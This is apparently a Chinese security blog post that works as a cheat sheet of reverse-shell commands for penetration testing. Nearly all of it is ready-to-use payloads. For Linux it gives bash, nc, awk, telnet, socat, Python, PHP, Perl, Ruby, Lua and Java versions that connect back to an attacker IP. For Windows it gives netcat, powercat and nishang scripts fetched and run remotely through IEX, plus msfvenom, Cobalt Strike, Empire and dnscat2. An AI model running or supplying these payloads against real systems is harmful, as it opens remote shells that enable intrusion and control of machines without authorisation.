- A+
所属分类:信息安全
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。
Linux 反弹shell
姿势一:bash反弹
1 2 |
bash -i >& /dev/tcp/192.168.99.242/1234 0>&1 base64版:bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}' |
在线编码地址:http://www.jackson-t.ca/runtime-exec-payloads.html
其他版本:
1 |
exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5;doneexec /bin/sh 0</dev/tcp/192.168.99.242/1234 1>&0 2>&0 |
姿势二:nc反弹
1 |
nc -e /bin/bash 192.168.99.242 1234 |
姿势三:awk反弹
1 |
awk 'BEGIN{s="/inet/tcp/0/192.168.99.242/1234";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' |
姿势四:telnet反弹
备注:需要在攻击主机上分别监听1234和4321端口,执行反弹shell命令后,在1234终端输入命令,4321查看命令执行后的结果。
1 |
telnet 192.168.99.242 1234 | /bin/bash | telnet 192.168.99.242 4321 |
姿势五:socat反弹
1 |
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.99.242:1234 |
姿势六:Python反弹
1 2 3 4 5 |
python -c "importos,socket,subprocess; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(('192.168.99.242',1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);" |
姿势七:PHP反弹
1 |
php -r '$sock=fsockopen("192.168.99.242",1234);exec("/bin/sh -i <&3 >&3 2>&3");' |
姿势八:Perl反弹
1 2 3 4 5 6 7 |
perl -e 'use Socket; $i="192.168.99.242"; $p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};' |
姿势九:Ruby反弹
1 |
ruby -rsocket -e'f=TCPSocket.open("192.168.99.242",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' |
姿势十:Lua反弹
1 |
lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.99.242','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');" |
姿势十一:JAVA反弹
1 2 3 4 5 6 7 8 9 10 11 12 13 |
public class Revs { /** * @param args * @throws Exception */ public static void main(String[] args) throws Exception { // TODO Auto-generated method stub Runtime r = Runtime.getRuntime(); String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5; done"}; Process p = r.exec(cmd); p.waitFor(); }} |
保存为Revs.java文件,编译执行,成功反弹shell。
1 |
javac Revs.java java Revs |
Windows反弹shell
姿势一:nc反弹
1 2 3 |
netcat 下载:https://eternallybored.org/misc/netcat/ 服务端反弹: nc 192.168.99.242 1234 -e c:\windows\system32\cmd.exe |
姿势二:powershell反弹
powercat是netcat的powershell版本,功能免杀性都要比netcat好用的多。
1 2 |
PS C:\WWW>powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.99.242 -p 1234 -e cmd |
下载到目标机器本地执行:
1 |
PS C:\WWW> Import-Module ./powercat.ps1PS C:\WWW> powercat -c 192.168.99.242 -p 1234 -e cmd |
姿势三:MSF反弹shell
使用msfvenom生成相关Payload
1 |
msfvenom -l payloads | grep 'cmd/windows/reverse' msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.99.242 LPORT=1234 |
姿势四:Cobalt strike反弹shell
1 2 3 |
1、配置监听器:点击Cobalt Strike——>Listeners——>在下方Tab菜单Listeners,点击add。 2、生成payload:点击Attacks——>Packages——>Windows Executable,保存文件位置。 3、目标机执行powershell payload |
姿势五:Empire反弹shell
1 |
usestager windows/launcher_vbsinfoset Listener testexecute |
姿势六:nishang反弹shell
Reverse TCP shell:
1 2 |
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com /samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 10.1.1.210 -port 1234 |
Reverse UDP shell:
1 2 |
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellUdp.ps1'); Invoke-PowerShellUdp -Reverse -IPAddress 10.1.1.210 -port 1234 |
姿势七:Dnscat反弹shell
github项目地址:
1 2 |
https://github.com/iagox86/dnscat2 服务端: |
1 2 |
ruby dnscat2.rb --dns "domain=lltest.com,host=xx.xx.xx.xx" --no-cache -e open -e open 目标主机: |
1 2 |
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1'); Start-Dnscat2 -Domain lltest.com -DNSServer xx.xx.xx.xx |
- 我的微信
- 这是我的微信扫一扫
- 我的微信公众号
- 我的微信公众号扫一扫